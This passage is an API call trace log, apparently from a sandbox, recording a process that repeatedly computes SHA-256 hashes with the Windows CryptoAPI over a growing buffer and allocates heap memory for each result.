	[0253.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c41f8
	[0253.087] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c41f8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c41f8, pdwDataLen=0x128c3c) returned 1
	[0253.087] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.087] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.087] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.088] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.088] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0253.088] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.088] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4220
	[0253.088] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4220, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4220, pdwDataLen=0x128c3c) returned 1
	[0253.088] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.088] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.088] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.089] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.089] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0253.089] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.089] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4248
	[0253.089] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4248, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4248, pdwDataLen=0x128c3c) returned 1
	[0253.089] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.089] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.089] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.089] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.089] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0253.090] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.090] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4270
	[0253.090] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4270, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4270, pdwDataLen=0x128c3c) returned 1
	[0253.090] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.090] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.090] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.090] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.090] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0253.090] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.090] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4298
	[0253.090] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4298, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4298, pdwDataLen=0x128c3c) returned 1
	[0253.090] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.090] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.090] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.091] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.091] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0253.091] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.091] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c42c0
	[0253.091] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c42c0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c42c0, pdwDataLen=0x128c3c) returned 1
	[0253.091] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.091] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.091] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.092] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.092] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0253.092] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.092] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c42e8
	[0253.092] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c42e8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c42e8, pdwDataLen=0x128c3c) returned 1
	[0253.092] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.092] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.092] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.092] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.092] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0253.092] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.092] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4310
	[0253.092] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4310, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4310, pdwDataLen=0x128c3c) returned 1
	[0253.092] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.093] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.093] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.093] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.093] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0253.093] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.093] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4338
	[0253.093] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4338, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4338, pdwDataLen=0x128c3c) returned 1
	[0253.093] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.093] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.093] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.094] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.094] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0253.094] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.094] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4360
	[0253.094] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4360, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4360, pdwDataLen=0x128c3c) returned 1
	[0253.094] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.094] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.094] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.095] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.095] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0253.095] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4388
	[0253.095] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4388, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4388, pdwDataLen=0x128c3c) returned 1
	[0253.095] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.095] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.095] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.095] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.095] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0253.095] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c43b0
	[0253.096] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c43b0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c43b0, pdwDataLen=0x128c3c) returned 1
	[0253.096] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.096] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.096] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.096] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.096] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0253.096] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.096] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c43d8
	[0253.096] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c43d8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c43d8, pdwDataLen=0x128c3c) returned 1
	[0253.096] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.096] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.096] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.097] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.097] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0253.097] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.097] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4400
	[0253.097] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4400, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4400, pdwDataLen=0x128c3c) returned 1
	[0253.097] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.097] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.097] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.098] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.098] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0253.098] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.098] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4428
	[0253.098] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4428, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4428, pdwDataLen=0x128c3c) returned 1
	[0253.098] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.098] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.098] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.098] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.098] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0253.098] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.098] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4450
	[0253.098] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4450, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4450, pdwDataLen=0x128c3c) returned 1
	[0253.098] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.099] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.099] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.099] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.099] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0253.099] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.099] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4478
	[0253.099] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4478, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4478, pdwDataLen=0x128c3c) returned 1
	[0253.099] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.099] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.099] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.100] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.100] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0253.100] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.100] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c44a0
	[0253.100] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c44a0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c44a0, pdwDataLen=0x128c3c) returned 1
	[0253.100] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.100] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.100] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.101] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.101] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0253.101] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.101] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c44c8
	[0253.101] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c44c8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c44c8, pdwDataLen=0x128c3c) returned 1
	[0253.101] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.101] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.101] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.101] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.101] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0253.101] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.101] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c44f0
	[0253.101] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c44f0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c44f0, pdwDataLen=0x128c3c) returned 1
	[0253.101] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.101] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.102] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.102] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.102] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0253.102] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.102] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4518
	[0253.102] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4518, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4518, pdwDataLen=0x128c3c) returned 1
	[0253.102] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.102] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.102] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.103] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.103] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0253.103] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.103] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4540
	[0253.103] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4540, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4540, pdwDataLen=0x128c3c) returned 1
	[0253.103] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.103] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.103] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.103] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.104] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0253.104] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.104] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4568
	[0253.104] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4568, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4568, pdwDataLen=0x128c3c) returned 1
	[0253.104] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.104] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.104] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.104] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.104] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0253.104] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.104] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4590
	[0253.104] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4590, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4590, pdwDataLen=0x128c3c) returned 1
	[0253.104] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.104] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.104] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.105] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.105] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0253.105] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.105] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c45b8
	[0253.105] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c45b8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c45b8, pdwDataLen=0x128c3c) returned 1
	[0253.105] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.105] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.105] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.105] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.105] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0253.106] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.106] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c45e0
